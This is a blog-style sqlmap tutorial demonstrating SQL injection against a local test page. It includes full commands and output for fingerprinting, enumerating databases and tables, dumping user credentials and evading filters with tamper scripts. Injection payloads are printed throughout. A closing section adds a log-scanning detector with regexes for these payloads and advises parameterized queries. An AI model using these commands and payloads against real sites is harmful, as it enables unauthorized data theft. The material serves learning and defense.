Penetration Steps
Before we test this tool, download it first from Here, then extract it. I assume Python is already installed; here I am using Linux, and if you are on Windows, download Python for Windows, install it, and then put sqlmap in the same directory as the Python installation. Running sqlmap is quite simple: just give a command such as `$ python sqlmap.py` and sqlmap will start automatically (this is not for exploitation, only to check whether it runs properly). To see the options available in sqlmap, use `-h`, for example `$ python sqlmap.py -h`, and your command window will show the list of options that can be used.
I ran this test on my local computer (not a real target). You can try it on a real target, but the risk is yours alone (the UU ITE is already in force), so it is better to do it locally to stay safe, since this is only for learning.
My target is at http://127.0.0.1/hantu.php?id=1. Run sqlmap against it and follow the steps below.
Fingerprinting (-f)
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -u http://127.0.0.1/hantu.php?id=1
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:54:00

[22:54:00] [INFO] using '/home/khairu/Desktop/sqlmap/output/127.0.0.1/session' as session file
[22:54:00] [INFO] testing connection to the target url
[22:54:00] [INFO] testing if the url is stable, wait a few seconds
[22:54:01] [INFO] url is stable
[22:54:01] [INFO] testing if GET parameter 'id' is dynamic
[22:54:01] [INFO] confirming that GET parameter 'id' is dynamic
[22:54:02] [INFO] GET parameter 'id' is dynamic
[22:54:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:54:02] [INFO] testing sql injection on GET parameter 'id'
[22:54:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:54:03] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:54:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:54:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:54:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:54:13] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:54:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:54:14] [INFO] target url appears to be UNION injectable with 6 columns
[22:54:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
```
```text
sqlmap identified the following injection points with a total of 27 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9766=9766 AND 'eozw'='eozw

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,108,102,110,58),IFNULL(CAST(CHAR(90,108,100,67,103,114,118,81,113,110) AS CHAR),CHAR(32)),CHAR(58,104,107,118,58)), NULL# AND 'FznP'='FznP

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'iqxY'='iqxY
---
[22:59:52] [INFO] testing MySQL
[22:59:52] [INFO] confirming MySQL
[22:59:52] [INFO] the back-end DBMS is MySQL
[22:59:52] [INFO] actively fingerprinting MySQL
[22:59:52] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               comment injection fingerprint: MySQL 5.1.37
               html error message fingerprint: MySQL
[22:59:57] [INFO] Fetched data logged to text files under '/home/khairu/Desktop/sqlmap/output/127.0.0.1'

[*] shutting down at: 22:59:57
```
Server Banner (-b)
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -b -u http://127.0.0.1/hantu.php?id=1
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:05:03

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3649=3649 AND 'dXpp'='dXpp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106) AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND 'oHTN'='oHTN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'MCtM'='MCtM
---
[23:05:24] [INFO] the back-end DBMS is MySQL
[23:05:24] [INFO] fetching banner
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
banner: '5.1.37'
```
Gathering Server Information
Here we will find out the current user, the password hashes, and the name of the current database.
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --current-user --current-db --users --password -u http://127.0.0.1/hantu.php?id=1
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:16:58

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
[23:16:58] [INFO] fetching current user
current user:    'root@localhost'
[23:16:58] [INFO] fetching current database
current database:    'blog'
[23:16:58] [INFO] fetching database users
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
```
Listing all databases
Here we will list every database present on the target server.
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --dbs -u http://127.0.0.1/hantu.php?id=1
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:20:22

---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3649=3649 AND 'dXpp'='dXpp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106) AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND 'oHTN'='oHTN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'MCtM'='MCtM
---
[23:20:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
[23:20:23] [INFO] fetching database names
available databases [10]:
[*] bkd_database
[*] blog
[*] cdcol
[*] gaji_db
[*] information_schema
[*] mybb
[*] mysql
[*] northwind
[*] phpmyadmin
[*] test

[23:20:23] [INFO] Fetched data logged to text files under '/home/khairu/Desktop/sqlmap/output/127.0.0.1'

[*] shutting down at: 23:20:23
```
Listing the tables and columns of a database
Here we will look for the tables and columns in one of the databases we found earlier, by passing the database (and then the table) name to the matching option.
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --tables -D gaji_db -u http://127.0.0.1/hantu.php?id=1 -v 0
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:26:22

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3649=3649 AND 'dXpp'='dXpp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106) AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND 'oHTN'='oHTN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'MCtM'='MCtM
---
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
[23:26:22] [INFO] read from file '/home/khairu/Desktop/sqlmap/output/127.0.0.1/session': gaji_db, tb_cuti, gaji_db, tb_cuti, gaji_db, tb_gaji, gaji_db, tb_gaji, gaji_db, tb_jabatan, gaji_db, tb_jabatan, gaji_db, tb_karyawan, gaji_db, tb_karyawan, gaji_db, tb_user, gaji_db, tb_user
Database: gaji_db
[5 tables]
+-------------+
| tb_cuti     |
| tb_gaji     |
| tb_jabatan  |
| tb_karyawan |
| tb_user     |
+-------------+

[*] shutting down at: 23:26:22
```
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --columns -T tb_user -D gaji_db -u http://127.0.0.1/hantu.php?id=1 -v 0
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:28:49

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3649=3649 AND 'dXpp'='dXpp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106) AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND 'oHTN'='oHTN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'MCtM'='MCtM
---
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
Database: gaji_db
Table: tb_user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id_user  | int(1)      |
| password | varchar(32) |
| username | varchar(10) |
+----------+-------------+

[*] shutting down at: 23:28:50
```
Dump
The end result of a penetration is, of course, the information obtained, and dumping data is just one example. Dumping is the step in which the attacker reads all the rows of a table whose table and column names are already known.
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --dump -C password,username -T tb_user -D gaji_db -u http://127.0.0.1/hantu.php?id=1 -v 0
```
```text
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:32:57

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3649=3649 AND 'dXpp'='dXpp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106) AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND 'oHTN'='oHTN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'MCtM'='MCtM
---
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5.0.11
Database: gaji_db
Table: tb_user
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| 123      | 123      |
| admin    | admin    |
+----------+----------+

[*] shutting down at: 23:32:58
```
The Simple Way
To find out the version, DBMS type, users, and password hashes of a MySQL injection target, the options above can also be combined in a single run, in several ways:
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -b --current-user --current-db --dbs --users --password -u http://127.0.0.1/hantu.php?id=1 -v 0
```
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -b --current-user --current-db --dbs --users \
    --password --tables --dump-all -u http://127.0.0.1/hantu.php?id=1 -v 0
```
```text
Database: cdcol
Table: cds
[3 entries]
+----+------------------+------+-----------------------------------+
| id | interpret        | jahr | titel                             |
+----+------------------+------+-----------------------------------+
| 1  | Ryuichi Sakamoto | 1990 | Beauty                            |
| 4  | Groove Armada    | 2001 | Goodbye Country (Hello Nightclub) |
| 5  | Bran Van 3000    | 1997 | Glee                              |
+----+------------------+------+-----------------------------------+
```
```console
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -b --dbs -u http://localhost/hantu.php?id=1 --tamper \
    tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
```
```text
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               html error message fingerprint: MySQL
banner: '5.1.37'
[23:49:08] [INFO] fetching database names
[23:49:08] [PAYLOAD] 1'/**/UnIon/**/aLl/**/SeLecT/**/NulL,/**/NulL,/**/CONCAT(ChAR(58,112,106,104,58),IFNulL(cAst(schema_name/**/As/**/ChAR),ChAR(32)),ChAR(58,107,109,105,58)),/**/NulL,/**/NulL,/**/NulL/**/FROM/**/information_schema.SCHEMATA#/**/and/**/'DOPd'='DOPd
[23:49:08] [DEBUG] performed 1 queries in 0 seconds
available databases [10]:
[*] bkd_database
[*] blog
[*] cdcol
[*] gaji_db
[*] information_schema
[*] mybb
[*] mysql
[*] northwind
[*] phpmyadmin
[*] test

[*] shutting down at: 23:49:08
```
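Seen from the server side, every session above leaves the same three request shapes in the web server's access log: the boolean `AND n=n` probe, the `SLEEP(5)` probe, and the `UNION ALL SELECT ... CHAR(...)` extraction query, which the `--tamper` run only disguises with `/**/` comments and mixed case. The following scanner is an added example (not part of the original post and not sqlmap's code) that undoes those two transforms and flags such requests in constructed Apache-style log lines:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post). The query
# strings mirror the payload shapes sqlmap printed in the sessions above,
# including the space2comment / randomcase obfuscation of the --tamper run.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2011:23:20:22 +0700] "GET /hantu.php?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2011:23:20:23 +0700] "GET /hantu.php?id=1%27%20AND%203649%3D3649%20AND%20%27dXpp%27%3D%27dXpp HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2011:23:20:24 +0700] "GET /hantu.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27MCtM%27%3D%27MCtM HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2011:23:49:08 +0700] "GET /hantu.php?id=1%27/**/UnIon/**/aLl/**/SeLecT/**/NulL,/**/NulL,/**/CONCAT(ChAR(58,112,106,104,58),IFNulL(cAst(schema_name/**/As/**/ChAR),ChAR(32)),ChAR(58,107,109,105,58)),/**/NulL,/**/NulL,/**/NulL/**/FROM/**/information_schema.SCHEMATA%23/**/and/**/%27DOPd%27%3D%27DOPd HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# One rule per injection technique that sqlmap reported in the sessions above.
RULES = [
    ("boolean-based blind", re.compile(r"\band\s+(\d+)\s*=\s*\1\b")),
    ("time-based blind", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("union query", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("string-building char()", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)")),
]

def normalize(query: str) -> str:
    """URL-decode the query string and undo the two tamper transforms so that
    one lowercase rule set matches plain and obfuscated payloads alike."""
    q = unquote_plus(query)
    q = re.sub(r"/\*.*?\*/", " ", q)   # space2comment: '/**/' stands in for a space
    q = re.sub(r"\s+", " ", q)
    return q.lower()                    # randomcase: UnIon -> union

def classify(line: str):
    """Return the technique labels whose rule matches this log line's query string."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return []
    query = normalize(m.group(1).split("?", 1)[1])
    return [label for label, rx in RULES if rx.search(query)]

def scan(lines):
    """Map the index of every suspicious line to its labels; benign lines are skipped."""
    result = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            result[i] = hits
    return result

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG).items():
        print(f"line {i}: {', '.join(hits)}")
```

Such a rule set is a triage aid, not a filter: the fix for the application remains a parameterized query for `id`, and the log match only tells you where to look.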
1 comment:
Bro, how do you build a website so that it has the php?id=1 dork?